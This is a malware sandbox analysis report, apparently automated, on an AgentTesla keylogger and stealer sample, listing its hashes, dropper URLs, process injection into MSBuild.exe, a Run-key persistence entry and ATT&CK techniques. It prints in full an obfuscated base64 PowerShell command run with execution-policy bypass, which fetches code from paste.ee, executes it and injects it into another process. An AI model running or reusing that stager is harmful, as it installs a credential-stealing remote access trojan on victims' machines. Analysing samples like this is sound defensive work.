agenttesla | c4c846dfa5755910d28a93a91ecfea8dcde72860fea03da1a47adf9ce65470a1

General

Target

nnLfl.exe
Size

125KB
MD5

b438cf5e9aa34e6cfa3d8d27d2649326
SHA1

a2545f5c8af6da03288dd0b24ddc72fbb35cad2d
SHA256

c4c846dfa5755910d28a93a91ecfea8dcde72860fea03da1a47adf9ce65470a1
SHA512

d14ff36b56a7312a8860a87d242548b5e7df3f7174daeb2031b12a8d1bf5cfa8680442bf8ad1eb8393ec27fd65f6c02dfd51a93ba1974f6fa470218ef055ffdc

Score

10^/10

agenttesla keylogger persistence spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

httP://paste.ee/r/3rgRS

ps1.dropper

httPs://paste.ee/r/fgIgt

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

AgentTesla Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1320-1-0x0000000000400000-0x000000000044C000-memory.dmp	family_agenttesla
behavioral2/memory/1320-2-0x0000000000446E9E-mapping.dmp	family_agenttesla

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

4 872 powershell.exe
5 872 powershell.exe

flow	pid	process
4	872	powershell.exe
5	872	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

MSBuild.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\Run\Myfile = "C:\\Users\\Admin\\AppData\\Roaming\\Myfile\\Myfile.exe"	MSBuild.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 872 set thread context of 1320 872 powershell.exe MSBuild.exe
Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

nnLfl.exepowershell.exeMSBuild.exe

pid process

3768 nnLfl.exe
3768 nnLfl.exe
872 powershell.exe
872 powershell.exe
872 powershell.exe
1320 MSBuild.exe
1320 MSBuild.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

nnLfl.exepowershell.exeMSBuild.exe

description pid process

Token: SeDebugPrivilege 3768 nnLfl.exe
Token: SeDebugPrivilege 872 powershell.exe
Token: SeDebugPrivilege 1320 MSBuild.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

MSBuild.exe

pid process

1320 MSBuild.exe

description	pid	process	target process
PID 872 set thread context of 1320	872	powershell.exe	MSBuild.exe

pid	process
3768	nnLfl.exe
3768	nnLfl.exe
872	powershell.exe
872	powershell.exe
872	powershell.exe
1320	MSBuild.exe
1320	MSBuild.exe

description	pid	process
Token: SeDebugPrivilege	3768	nnLfl.exe
Token: SeDebugPrivilege	872	powershell.exe
Token: SeDebugPrivilege	1320	MSBuild.exe

pid	process
1320	MSBuild.exe

Suspicious use of WriteProcessMemory 11 IoCs

Processes:

nnLfl.exepowershell.exe

description	pid	process	target process
PID 3768 wrote to memory of 872	3768	nnLfl.exe	powershell.exe
PID 3768 wrote to memory of 872	3768	nnLfl.exe	powershell.exe
PID 3768 wrote to memory of 872	3768	nnLfl.exe	powershell.exe
PID 872 wrote to memory of 1320	872	powershell.exe	MSBuild.exe
PID 872 wrote to memory of 1320	872	powershell.exe	MSBuild.exe
PID 872 wrote to memory of 1320	872	powershell.exe	MSBuild.exe
PID 872 wrote to memory of 1320	872	powershell.exe	MSBuild.exe
PID 872 wrote to memory of 1320	872	powershell.exe	MSBuild.exe
PID 872 wrote to memory of 1320	872	powershell.exe	MSBuild.exe
PID 872 wrote to memory of 1320	872	powershell.exe	MSBuild.exe
PID 872 wrote to memory of 1320	872	powershell.exe	MSBuild.exe

C:\Users\Admin\AppData\Local\Temp\nnLfl.exe
"C:\Users\Admin\AppData\Local\Temp\nnLfl.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3768

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -w 1 /e JAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABmAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAJwAgACsAIABbAEMAaABhAHIAXQA1ADgAIAArACAAJwAvAC8AcABhAHMAdABlAC4AZQBlAC8AcgAvADMAcgBnAFIAUwAnACkALgBSAGUAcABsAGEAYwBlACgAIgBeACIALAAgACIANAA0ACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACoAIgAsACAAIgA0ADgAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAIwAiACwAIAAiADcAOAAiACkAfABJAEUAWAA7AFsAQgB5AHQAZQBbAF0AXQAkAGYAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8AZgBnAEkAZwB0ACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnACQAJAAnACwAJwAwAHgAJwApAHwASQBFAFgAOwBbAEMALgBNAF0AOgA6AFIAKAAnAE0AUwBCAHUAaQBsAGQALgBlAHgAZQAnACwAJABmACkA
2⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:872

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
3⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1320

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/872-0-0x0000000000000000-mapping.dmp

Download
memory/1320-1-0x0000000000400000-0x000000000044C000-memory.dmp

Filesize
304KB

Download
memory/1320-2-0x0000000000446E9E-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads